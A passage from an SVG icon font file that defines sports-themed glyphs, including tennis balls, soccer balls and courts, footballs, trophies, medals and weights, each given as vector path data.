270.591-16.126-14.871-30.919-31.165-44.18-48.683l28.229-20.509-18.809-25.889-27.615 20.063c-13.979-22.238-25.644-46.078-34.659-71.181l31.082-10.099-9.889-30.434-30.679 9.968c-6.573-25.002-10.582-51.044-11.727-77.827h31.658v-32h-31.658c1.146-26.783 5.154-52.825 11.727-77.827l30.679 9.968 9.889-30.434-31.082-10.099c9.015-25.103 20.68-48.942 34.659-71.181l27.615 20.063 18.809-25.889-28.229-20.509c13.261-17.518 28.055-33.812 44.18-48.683-0.433-0.471 11.82 13.263 17.972 20.955v0zM212.641 185.905c-53.035 67.866-84.641 153.289-84.641 246.095 0 104.352 39.959 199.371 105.411 270.591 16.126-14.871 30.919-31.165 44.18-48.683l-28.229-20.509 18.809-25.889 27.615 20.063c13.979-22.238 25.644-46.078 34.659-71.181l-31.082-10.099 9.889-30.434 30.679 9.968c6.573-25.002 10.582-51.044 11.727-77.827h-31.658v-32h31.658c-1.146-26.783-5.154-52.825-11.727-77.827l-30.679 9.968-9.889-30.434 31.082-10.099c-9.015-25.103-20.68-48.942-34.659-71.181l-27.615 20.063-18.809-25.889 28.229-20.509c-13.261-17.518-28.055-33.812-44.18-48.683 0.433-0.471-13.778 15.548-20.771 24.496v0z" />
<glyph unicode="&#xea72;" glyph-name="tennis-ball" d="M777.411 702.591v0c-65.452-71.219-105.411-166.239-105.411-270.591s39.959-199.371 105.411-270.591c-65.573-60.471-153.179-97.409-249.411-97.409s-183.838 36.938-249.411 97.409c65.452 71.219 105.411 166.239 105.411 270.591s-39.959 199.371-105.411 270.591v0c65.573 60.471 153.179 97.409 249.411 97.409s183.838-36.938 249.411-97.409zM800 679.875c59.635-65.402 96-152.392 96-247.875s-36.365-182.472-96-247.875c-59.635 65.402-96 152.392-96 247.875s36.365 182.472 96 247.875v0zM256 679.875v0 0c59.635-65.402 96-152.392 96-247.875s-36.365-182.472-96-247.875c-59.635 65.402-96 152.392-96 247.875s36.365 182.472 96 247.875zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0z" />
<glyph unicode="&#xea73;" glyph-name="tennis-ball2" d="M800 725.287c-71.373 66.223-166.958 106.713-272 106.713s-200.627-40.489-272-106.713v0c78.731-73.051 128-177.415 128-293.287s-49.269-220.236-128-293.287c71.373-66.223 166.958-106.713 272-106.713s200.627 40.489 272 106.713c-78.731 73.051-128 177.415-128 293.287s49.269 220.236 128 293.287v0 0zM822.589 702.591c65.452-71.219 105.411-166.239 105.411-270.591s-39.959-199.371-105.411-270.591c-72.915 67.242-118.589 163.583-118.589 270.591s45.673 203.349 118.589 270.591v0 0zM233.411 702.591c-65.452-71.219-105.411-166.239-105.411-270.591s39.959-199.371 105.411-270.591c72.915 67.242 118.589 163.583 118.589 270.591s-45.673 203.349-118.589 270.591v0z" />
<glyph unicode="&#xea74;" glyph-name="bowling-ball" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 544c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM624 384c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM432 384c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea75;" glyph-name="bowling-ball2" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 544c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM624 384c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM432 384c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea76;" glyph-name="billiard-ball" d="M576.008 432c19.427-14.596 31.992-37.83 31.992-64 0-44.183-35.817-80-80-80s-80 35.817-80 80c0 26.17 12.565 49.404 31.992 64-19.427 14.596-31.992 37.83-31.992 64 0 44.183 35.817 80 80 80s80-35.817 80-80c0-26.17-12.565-49.404-31.992-64v0 0zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 224c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0zM528 320c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM528 448c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea77;" glyph-name="billiard-ball2" d="M576.008 432c19.427-14.596 31.992-37.83 31.992-64 0-44.183-35.817-80-80-80s-80 35.817-80 80c0 26.17 12.565 49.404 31.992 64-19.427 14.596-31.992 37.83-31.992 64 0 44.183 35.817 80 80 80s80-35.817 80-80c0-26.17-12.565-49.404-31.992-64v0 0zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 224c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0zM528 320c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM528 448c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xea78;" glyph-name="soccer-ball" d="M282.096 494.362l113.485-48.172 40.052-137.68-78.856-81.658-129.431-7.11c-39.496 55.842-63.826 123.172-66.993 195.993l121.743 78.626zM284.936 527.92l-49.333 127.558c41.686 54.459 98.242 96.933 163.603 121.355l112.794-91.809v-122.047l-106.134-86.389-120.929 51.331zM387.908 213.023l72.404 74.977h131.769l75.234-77.907-34.756-131.027c-33.143-9.804-68.237-15.066-104.559-15.066s-71.416 5.262-104.559 15.066l-35.533 133.957zM695.414 227.061l-75.882 78.579 41.276 141.887 112.002 47.542 122.837-79.333c-3.167-72.821-27.497-140.151-66.993-195.993l-133.24 7.319zM771.606 529.321l-122.417-51.963-105.188 85.619v122.047l112.794 91.809c65.361-24.423 121.917-66.896 163.603-121.355l-48.791-126.156zM213.234 622.751l41.532-107.667-94.108-60.896c3.655 61.467 22.398 118.872 52.576 168.563zM386.164 92.328c-51.591 21.568-97.225 54.547-133.745 95.782l106.713 5.768 27.032-101.55zM669.836 92.328l27.032 101.55 106.713-5.768c-36.521-41.235-82.154-74.214-133.745-95.782zM842.766 622.751c30.178-49.691 48.921-107.096 52.576-168.563l-94.108 60.896 41.532 107.667zM620.053 788.393l-92.053-74.793-92.053 74.793c29.421 7.577 60.266 11.607 92.053 11.607s62.632-4.030 92.053-11.607zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0zM528 534.4l102.4-83.2-41.601-131.2h-121.6l-41.601 131.2 102.4 83.2z" />
<glyph unicode="&#xea79;" glyph-name="soccer-ball2" d="M282.096 494.362l113.485-48.172 40.052-137.68-78.856-81.658-129.431-7.11c-39.496 55.842-63.826 123.172-66.993 195.993l121.743 78.626zM284.936 527.92l-49.333 127.558c41.686 54.459 98.242 96.933 163.603 121.355l112.794-91.809v-122.047l-106.134-86.389-120.929 51.331zM387.908 213.023l72.404 74.977h131.769l75.234-77.907-34.756-131.027c-33.143-9.804-68.237-15.066-104.559-15.066s-71.416 5.262-104.559 15.066l-35.533 133.957zM695.414 227.061l-75.882 78.579 41.276 141.887 112.002 47.542 122.837-79.333c-3.167-72.821-27.497-140.151-66.993-195.993l-133.24 7.319zM771.606 529.321l-122.417-51.963-105.188 85.619v122.047l112.794 91.809c65.361-24.423 121.917-66.896 163.603-121.355l-48.791-126.156zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0z" />
<glyph unicode="&#xea7a;" glyph-name="soccer-court" d="M96 288h128v288h-128v96.001c0 17.448 14.226 31.999 31.775 31.999h800.45c17.499 0 31.775-14.326 31.775-31.999v-96.001h-128v-288h128v-96.001c0-17.448-14.226-31.999-31.775-31.999h-800.45c-17.499 0-31.775 14.326-31.775 31.999v96.001zM544 288.879v-128.879h-32v128.879c-71.999 7.959-128 69-128 143.121s56.001 135.162 128 143.121v128.879h32v-128.879c71.999-7.959 128-69 128-143.121s-56.001-135.162-128-143.121zM544 321.134c54.277 7.764 96 54.442 96 110.866s-41.723 103.102-96 110.866v-221.732zM512 542.866c-54.277-7.764-96-54.442-96-110.866s41.723-103.102 96-110.866v221.732zM127.785 736c-35.228 0-63.785-28.51-63.785-63.918v-480.165c0-35.301 28.791-63.918 63.785-63.918h800.43c35.228 0 63.785 28.51 63.785 63.918v480.165c0 35.301-28.791 63.918-63.785 63.918h-800.43zM864 544h96v-224h-96v224zM96 544h96v-224h-96v224z" />
<glyph unicode="&#xea7b;" glyph-name="soccer-court2" d="M64 288v-96.082c0-35.301 28.791-63.918 63.785-63.918h384.215v160.879c-71.999 7.959-128 69-128 143.121s56.001 135.162 128 143.121v160.879h-384.215c-35.228 0-63.785-28.51-63.785-63.918v-96.082h160v-288h-160zM992 288v-96.082c0-35.408-28.558-63.918-63.785-63.918h-384.215v160.879c71.999 7.959 128 69 128 143.121s-56.001 135.162-128 143.121v160.879h384.215c34.994 0 63.785-28.617 63.785-63.918v-96.082h-160v-288h160zM544 321.134c54.277 7.764 96 54.442 96 110.866s-41.723 103.102-96 110.866v-221.732zM512 542.866c-54.277-7.764-96-54.442-96-110.866s41.723-103.102 96-110.866v221.732zM864 544v-224h128v224h-128zM64 544v-224h128v224h-128z" />
<glyph unicode="&#xea7c;" glyph-name="football" d="M640 416h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-64v32h64v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h64v-32h-64v-64h-32v64zM528 224v0c-100.309 0-180.163 28.288-241.007 64v288c60.844 35.712 140.699 64 241.007 64s180.163-28.288 241.007-64v-288c-60.844-35.712-140.699-64-241.007-64zM256 307.868c-82.797 57.759-121.6 124.132-121.6 124.132s38.803 66.373 121.6 124.132v-248.265zM800 307.868v248.265c82.797-57.759 121.6-124.132 121.6-124.132s-38.803-66.373-121.6-124.132zM96 432c0 0 128-240 432-240s432 240 432 240c0 0-128 240-432 240s-432-240-432-240v0z" />
<glyph unicode="&#xea7d;" glyph-name="football2" d="M640 416h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-64v32h64v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h64v-32h-64v-64h-32v64zM288 250.348c62.912-33.601 142.382-58.348 240-58.348s177.088 24.747 240 58.348v0 363.304c-62.912 33.601-142.382 58.348-240 58.348s-177.088-24.747-240-58.348v-363.304zM256 269.024c-110.513 70.188-160 162.976-160 162.976s49.487 92.788 160 162.976v-325.952zM800 269.024c110.513 70.188 160 162.976 160 162.976s-49.487 92.788-160 162.976v-325.952z" />
<glyph unicode="&#xea7e;" glyph-name="football3" d="M640 448h-32v64h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-64v-32h64v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h64v32h-64v64h-32v-64zM528 672v0c304 0 432-240 432-240s-128-240-432-240c-304 0-432 240-432 240s128 240 432 240zM528 640c-272 0-393.6-208-393.6-208s121.6-208 393.6-208c272 0 393.6 208 393.6 208s-121.6 208-393.6 208v0z" />
<glyph unicode="&#xea7f;" glyph-name="football4" d="M640 416h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-32v-64h-32v64h-64v32h64v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h32v64h32v-64h64v-32h-64v-64h-32v64zM528 672c-304 0-432-240-432-240s128-240 432-240c304 0 432 240 432 240s-128 240-432 240v0z" />
<glyph unicode="&#xea80;" glyph-name="basketball3" d="M551.848 64.76v0c-5.147 25.613-7.848 52.111-7.848 79.24 0 108.873 43.496 207.586 114.060 279.711-42.233 59.126-95.072 110.155-155.739 150.309-62.052-124.686-187.268-212.406-333.764-221.279v0c36.25-165.146 183.413-288.741 359.443-288.741 8.012 0 15.964 0.256 23.848 0.76zM583.814 68.205c67.931 10.336 129.758 39.244 180.139 81.383v0c-10.544 90.053-41.3 173.929-87.608 246.97-62.209-65.904-100.345-154.777-100.345-252.558 0-25.982 2.693-51.335 7.814-75.795v0zM880.22 538.943c-44.596 147.070-178.783 255.185-339.043 260.826v0c1.864-15.663 2.823-31.604 2.823-47.768 0-52.434-10.089-102.511-28.431-148.397 64.556-41.952 120.869-95.519 165.976-157.739 55.061 47.913 123.356 81.010 198.675 93.079v0zM888.186 507.795v0c-71.692-10.908-136.586-42.502-188.403-88.503 46.807-72.11 79.127-154.494 92.836-243.027v0c64.002 66.211 103.38 156.375 103.38 255.735 0 25.982-2.693 51.335-7.814 75.795zM163.039 384.484v0 0c137.393 7.002 254.892 89.358 311.985 206.555-68.816 40.353-146.507 67.203-229.437 76.914-53.429-63.88-85.588-146.161-85.588-235.953 0-16.101 1.034-31.961 3.039-47.516zM508.961 799.516c-91.812-4.679-174.74-43.008-236.696-102.896 77.495-12 150.279-38.26 215.585-76.013 15.603 40.807 24.15 85.102 24.15 131.393 0 16.101-1.034 31.961-3.039 47.516v0 0zM133.084 368.050c-3.346 20.823-5.084 42.183-5.084 63.95 0 220.914 179.086 400 400 400s400-179.086 400-400c0-220.914-179.086-400-400-400-193.544 0-354.983 137.46-392.015 320.079-1.072 5.287-2.040 10.611-2.901 15.971v0z" />
<glyph unicode="&#xea81;" glyph-name="basketball4" d="M130.823 384.31c-1.864 15.663-2.823 31.604-2.823 47.768 0 89.682 29.514 172.471 79.359 239.184 97.296-5.078 188.373-33.648 267.665-80.144-59.714-122.576-185.505-207.039-331.024-207.039-3.807 0-12.579 0.21-13.177 0.232v0zM135.985 352.157c37.031-182.618 198.47-320.079 392.015-320.079 10.614 0 21.132 0.413 31.537 1.225v0c-10.117 35.177-15.537 72.343-15.537 110.775 0 108.873 43.496 207.586 114.060 279.711-42.233 59.126-95.072 110.155-155.739 150.309-65.492-131.599-201.347-222.020-358.321-222.020-2.678 0-5.349 0.026-8.015 0.079v0 0zM503.443 831.337c-107.221-6.494-203.043-55.225-271.044-129.773v0c92.431-8.281 179.057-36.716 255.451-80.879 15.603 40.807 24.15 85.102 24.15 131.393 0 27.21-2.953 53.731-8.557 79.259v0 0zM536.015 832c178.963-3.517 329.114-124.568 376.448-289.146-88.051-6.867-168.098-42.246-230.918-96.911-45.107 62.22-101.42 115.787-165.976 157.739 18.342 45.886 28.431 95.963 28.431 148.397 0 27.369-2.749 54.097-7.985 79.921v0zM767.184 111.438c-50.565-37.78-110.366-63.88-175.404-74.302v0c-10.262 33.843-15.78 69.748-15.78 106.943 0 97.78 38.136 186.654 100.345 252.558 52.801-83.282 85.382-180.65 90.839-285.199v0 0zM797.486 136.478c80.195 73.152 130.514 178.5 130.514 295.6 0 27.129-2.701 53.627-7.848 79.24-84.34-5.395-160.952-39.2-220.368-91.948 53.763-82.827 88.413-179.207 97.702-282.892v0 0z" />
<glyph unicode="&#xea82;" glyph-name="baseball-set" d="M636.374 144.362v0c-1.138 5.23-1.882 11.286-1.566 8.927 65.944 7.754 118.256 60.066 126.011 126.011 49.851-6.676 89.32-46.145 95.996-95.996-65.944-7.754-118.256-60.066-126.011-126.011-46.835 6.272-84.507 41.49-94.429 87.069zM728.478 278.963v0 0c-7.454-47.976-45.358-85.88-93.334-93.334 7.454 47.976 45.358 85.88 93.334 93.334zM856.478 150.963c-7.454-47.976-45.358-85.88-93.334-93.334 7.454 47.976 45.358 85.88 93.334 93.334v0 0zM441.782 429.815l-232.843-264.96 28.467-28.467 264.96 232.843-60.583 60.583zM462.95 453.902l63.503-63.503 352.746 309.989c31.335 27.537 32.744 73.853 3.481 103.116l-6.626 6.626c-29.412 29.412-75.464 27.984-103.116-3.481l-309.989-352.746zM187.771 140.768l-21.168-24.087-11.418 11.418c-6.191 6.191-16.457 5.961-22.523-0.104-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-11.418 11.418 24.087 21.168-25.547 25.547zM162.948 160.809l590.395 669.115c38.524 43.661 102.629 45.543 143.55 4.622l10.203-10.203c40.891-40.891 38.852-105.191-4.622-143.55l-669.142-590.42c7.491-17.5 4.132-38.597-10.159-52.888-18.876-18.876-49.139-18.743-67.886 0.004l-45.247 45.247c-18.687 18.687-18.749 49.141-0.004 67.886 14.4 14.4 35.427 17.737 52.913 10.187v0 0zM745.811 312.296c-79.529 0-144-64.471-144-144s64.471-144 144-144c79.529 0 144 64.471 144 144s-64.471 144-144 144v0z" />
<glyph unicode="&#xea83;" glyph-name="baseball-set2" d="M889.017 183.503c-7.072 67.384-60.616 120.928-128 128v0c0.524-4.997 0.793-10.071 0.793-15.207 0-79.529-64.471-144-144-144-5.136 0-10.209 0.269-15.207 0.793 7.072-67.384 60.616-120.928 128-128-0.524 4.997-0.793 10.071-0.793 15.207 0 79.529 64.471 144 144 144 5.136 0 10.209-0.269 15.207-0.793v0zM888.818 151.299c-7.754-65.944-60.066-118.257-126.011-126.011-0.657 4.909-0.997 9.919-0.997 15.007 0 61.856 50.144 112 112 112 5.089 0 10.098-0.339 15.007-0.997v0zM728.814 311.304c-65.944-7.754-118.257-60.066-126.011-126.011 4.909-0.657 9.919-0.997 15.007-0.997 61.856 0 112 50.144 112 112 0 5.089-0.339 10.098-0.997 15.007v0zM419.748 451.849l-236.467-267.996 73.123-73.123 267.996 236.467-104.652 104.652zM440.961 475.891l312.382 354.033c38.524 43.661 102.629 45.543 143.55 4.622l10.203-10.203c40.891-40.891 38.852-105.191-4.622-143.55l-354.033-312.382-107.48 107.48zM234.493 87.386c5.917-16.866 2.166-36.414-11.321-49.901-18.876-18.876-49.139-18.743-67.886 0.004l-45.247 45.247c-18.687 18.687-18.749 49.141-0.004 67.886 13.563 13.563 33.004 17.312 49.829 11.394l74.629-74.629z" />
<glyph unicode="&#xea84;" glyph-name="tennis-ball3" d="M528 832c-220.914 0-400-179.086-400-400s179.086-400 400-400c220.914 0 400 179.086 400 400s-179.086 400-400 400v0zM528 64c-203.241 0-368 164.759-368 368s164.759 368 368 368c137.154 0 256.784-75.032 320.081-186.288-29.956-23.619-67.773-37.712-108.881-37.712-39.126 0-67.2 16-105.026 34.898s-67.387 29.102-106.174 29.102c-114.875 0-208-93.125-208-208s93.125-208 208-208c38.787 0 80 16 106.706 29.637s65.368 34.363 104.494 34.363c41.108 0 78.924-14.093 108.881-37.712-63.297-111.256-182.926-186.288-320.081-186.288v0zM896 432v0c0-54.499-11.847-106.23-33.105-152.76-34.572 25.613-77.364 40.76-123.695 40.76-46.599 0-97.931-27.782-131.2-44.8-13.645-6.979-48.421-19.2-80-19.2-97.202 0-176 78.798-176 176s78.798 176 176 176c31.579 0 53.045-5.723 80-19.2 32-16 84.601-44.8 131.2-44.8 46.33 0 89.122 15.147 123.695 40.76 21.259-46.53 33.105-98.262 33.105-152.76z" />
<glyph unicode="&#xea85;" glyph-name="tennis-ball4" d="M887.968 606.631c-1.345 2.768 5.808-12.096 10.134-22.617 19.27-46.867 29.898-98.199 29.898-152.014 0-62.612-14.386-121.864-40.032-174.631-7.755 7.935-16.14 15.252-25.073 21.871-34.572 25.613-77.364 40.76-123.695 40.76-46.599 0-97.931-27.782-131.2-44.8-13.645-6.979-48.421-19.2-80-19.2-97.202 0-176 78.798-176 176s78.798 176 176 176c31.579 0 53.045-5.723 80-19.2 32-16 84.601-44.8 131.2-44.8 46.33 0 89.122 15.147 123.695 40.76 8.934 6.618 17.318 13.936 25.073 21.871v0zM871.909 636.392c1.986-3.335-3.566 6.079-8.663 13.89-71.381 109.406-194.869 181.718-335.246 181.718-220.914 0-400-179.086-400-400s179.086-400 400-400c146.236 0 274.144 78.474 343.909 195.608-7.217 8.278-15.197 15.874-23.828 22.68-29.956 23.619-67.773 37.712-108.881 37.712-39.126 0-77.788-20.726-104.494-34.363s-67.919-29.637-106.706-29.637c-114.875 0-208 93.125-208 208s93.125 208 208 208c38.787 0 68.347-10.204 106.174-29.102s65.9-34.898 105.026-34.898c41.108 0 78.924 14.093 108.881 37.712 8.632 6.806 16.611 14.402 23.828 22.68v0z" />
<glyph unicode="&#xea86;" glyph-name="trophy3" d="M512 128v160c-105.897 0.092-192 85.918-192 191.778v0.222c-112 48-128 288-128 288h672c0 0-16-240-128-288v0-0.222c0-105.907-85.946-191.687-192-191.778v-160h128v-32h-288v32h128zM352 736v-255.759c0-88.499 71.657-160.241 160.035-160.241h31.93c88.385 0 160.035 71.513 160.035 160.241v255.759h-352zM320 736h-92.8c0 0 17.733-167.061 92.8-220.8v220.8zM735.438 736v-220.17c75.066 53.739 92.812 220.17 92.812 220.17h-92.812z" />
<glyph unicode="&#xea87;" glyph-name="trophy4" d="M512 128h-128v-32h288v32h-128v160c106.054 0.092 192 85.871 192 191.778v0.222c112 48 128 288 128 288h-672c0 0 16-240 128-288v-0.222c0-105.86 86.103-191.686 192-191.778v-160zM320 736v-220.8c-75.066 53.739-92.8 220.8-92.8 220.8h92.8zM735.438 736h92.812c0 0-17.746-166.431-92.812-220.17v220.17z" />
<glyph unicode="&#xea88;" glyph-name="trophy-one" d="M512 128v160c-105.897 0.092-192 85.918-192 191.778v0.222c-112 48-128 288-128 288h672c0 0-16-240-128-288v0-0.222c0-105.907-85.946-191.687-192-191.778v-160h128v-32h-288v32h128zM352 736v-255.759c0-88.499 71.657-160.241 160.035-160.241h31.93c88.385 0 160.035 71.513 160.035 160.241v255.759h-352zM320 736h-92.8c0 0 17.733-167.061 92.8-220.8v220.8zM735.438 736v-220.17c75.066 53.739 92.812 220.17 92.812 220.17h-92.812zM543.904 384h-31.904v192h-64v32c52.81 0 64 28.654 64 64h31.904v-288z" />
<glyph unicode="&#xea89;" glyph-name="trophy-one2" d="M512 128h-128v-32h288v32h-128v160c106.054 0.092 192 85.871 192 191.778v0.222c112 48 128 288 128 288h-672c0 0 16-240 128-288v-0.222c0-105.86 86.103-191.686 192-191.778v-160zM320 736v-220.8c-75.066 53.739-92.8 220.8-92.8 220.8h92.8zM735.438 736h92.812c0 0-17.746-166.431-92.812-220.17v220.17zM543.904 384h-31.904v192h-64v32c52.81 0 64 28.654 64 64h31.904v-288z" />
<glyph unicode="&#xea8a;" glyph-name="trophy5" d="M672 160h96v-128h-480v128h96v96h128v128c-105.897 0.092-192 85.918-192 191.778v0.222c-112 48-128 288-128 288h672c0 0-16-240-128-288v-0.222c0-105.907-85.946-191.687-192-191.778v-128h128v-96zM352 832v-255.759c0-88.499 71.657-160.241 160.035-160.241h31.93c88.385 0 160.035 71.513 160.035 160.241v255.759h-352zM320 832h-92.8c0 0 17.733-167.061 92.8-220.8v220.8zM735.438 832v-220.17c75.066 53.739 92.812 220.17 92.812 220.17h-92.812zM416 224v-64h224v64h-224zM320 128v-64h416v64h-416z" />
<glyph unicode="&#xea8b;" glyph-name="trophy6" d="M672 160v96h-128v128c106.054 0.092 192 85.871 192 191.778v0.222c112 48 128 288 128 288h-672c0 0 16-240 128-288v-0.222c0-105.86 86.103-191.686 192-191.778v-128h-128v-96h-96v-128h480v128h-96zM320 832v-220.8c-75.066 53.739-92.8 220.8-92.8 220.8h92.8zM735.438 832h92.812c0 0-17.746-166.431-92.812-220.17v220.17z" />
<glyph unicode="&#xea8c;" glyph-name="medal" d="M608 896h-160v-461.656c25.022 8.844 51.949 13.656 80 13.656s54.978-4.812 80-13.656v461.656zM640 896v-475.681c19.058-10.074 36.596-22.639 52.18-37.261l43.82 128.622v384.32h-96zM416 896h-96v-384.32l43.82-128.622c15.585 14.622 33.123 27.187 52.18 37.261v475.681zM339.718 356.845l-51.718 155.155v416h480v-416l-51.718-155.155c32.384-40.908 51.718-92.618 51.718-148.845 0-132.548-107.452-240-240-240s-240 107.452-240 240c0 56.226 19.335 107.936 51.718 148.845v0 0zM528 0c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0z" />
<glyph unicode="&#xea8d;" glyph-name="medal2" d="M608 928h-160v-459.955c25.294 7.772 52.158 11.955 80 11.955s54.706-4.183 80-11.955v459.955zM640 928h128v-416l-39.914-119.743c-24.627 26.729-54.542 48.512-88.086 63.688v472.056zM416 928h-128v-416l39.914-119.743c24.627 26.729 54.542 48.512 88.086 63.688v472.056zM528-32c132.548 0 240 107.452 240 240s-107.452 240-240 240c-132.548 0-240-107.452-240-240s107.452-240 240-240v0z" />
<glyph unicode="&#xea8e;" glyph-name="medal3" d="M608 896h-160v-461.656c25.022 8.844 51.949 13.656 80 13.656s54.978-4.812 80-13.656v461.656zM640 896v-475.681c19.058-10.074 36.596-22.639 52.18-37.261l43.82 128.622v384.32h-96zM416 896h-96v-384.32l43.82-128.622c15.585 14.622 33.123 27.187 52.18 37.261v475.681zM339.718 356.845l-51.718 155.155v416h480v-416l-51.718-155.155c32.384-40.908 51.718-92.618 51.718-148.845 0-132.548-107.452-240-240-240s-240 107.452-240 240c0 56.226 19.335 107.936 51.718 148.845v0 0zM528 0c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0zM528 130.462l-88.615-66.462 24.615 110.769-80 81.231h112l32 96 32-96h112l-80-81.231 32-110.769-96 66.462z" />
<glyph unicode="&#xea8f;" glyph-name="medal4" d="M608 928h-160v-459.955c25.294 7.772 52.158 11.955 80 11.955s54.706-4.183 80-11.955v459.955zM640 928h128v-416l-39.914-119.743c-24.627 26.729-54.542 48.512-88.086 63.688v472.056zM416 928h-128v-416l39.914-119.743c24.627 26.729 54.542 48.512 88.086 63.688v472.056zM528-32c132.548 0 240 107.452 240 240s-107.452 240-240 240c-132.548 0-240-107.452-240-240s107.452-240 240-240v0zM528 130.462l-88.615-66.462 24.615 110.769-80 81.231h112l32 96 32-96h112l-80-81.231 32-110.769-96 66.462z" />
<glyph unicode="&#xea90;" glyph-name="weights" d="M736 416h-416v-111.794c0-26.717-21.49-48.206-48-48.206-26.694 0-48 21.583-48 48.206v18.524c-5.004-1.769-10.39-2.73-16-2.73-26.694 0-48 21.514-48 48.054v47.946h-64v32h64v47.946c0 26.576 21.49 48.054 48 48.054 5.622 0 11.005-0.954 16-2.709v0 18.503c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-111.794h416v111.794c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-18.524c5.004 1.769 10.39 2.73 16 2.73 26.694 0 48-21.514 48-48.054v-47.946h64v-32h-64v-47.946c0-26.576-21.49-48.054-48-48.054-5.622 0-11.005 0.954-16 2.709v-18.503c0-26.717-21.49-48.206-48-48.206-26.694 0-48 21.583-48 48.206v111.794zM848 512c-8.837 0-16-6.875-16-15.926v-128.147c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v128.147c0 8.796-7.422 15.926-16 15.926v0zM208 512c-8.837 0-16-6.875-16-15.926v-128.147c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v128.147c0 8.796-7.422 15.926-16 15.926v0zM784 576c-8.837 0-16-7.119-16-16.309v-255.381c0-9.007 7.422-16.309 16-16.309 8.837 0 16 7.119 16 16.309v255.381c0 9.007-7.422 16.309-16 16.309v0zM272 576c-8.837 0-16-7.119-16-16.309v-255.381c0-9.007 7.422-16.309 16-16.309 8.837 0 16 7.119 16 16.309v255.381c0 9.007-7.422 16.309-16 16.309v0z" />
<glyph unicode="&#xea91;" glyph-name="weights2" d="M736 416h-416v-111.794c0-26.717-21.49-48.206-48-48.206-26.694 0-48 21.583-48 48.206v18.524c-5.004-1.769-10.39-2.73-16-2.73-26.694 0-48 21.514-48 48.054v47.946h-64v32h64v47.946c0 26.576 21.49 48.054 48 48.054 5.622 0 11.005-0.954 16-2.709v0 18.503c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-111.794h416v111.794c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-18.524c5.004 1.769 10.39 2.73 16 2.73 26.694 0 48-21.514 48-48.054v-47.946h64v-32h-64v-47.946c0-26.576-21.49-48.054-48-48.054-5.622 0-11.005 0.954-16 2.709v-18.503c0-26.717-21.49-48.206-48-48.206-26.694 0-48 21.583-48 48.206v111.794z" />
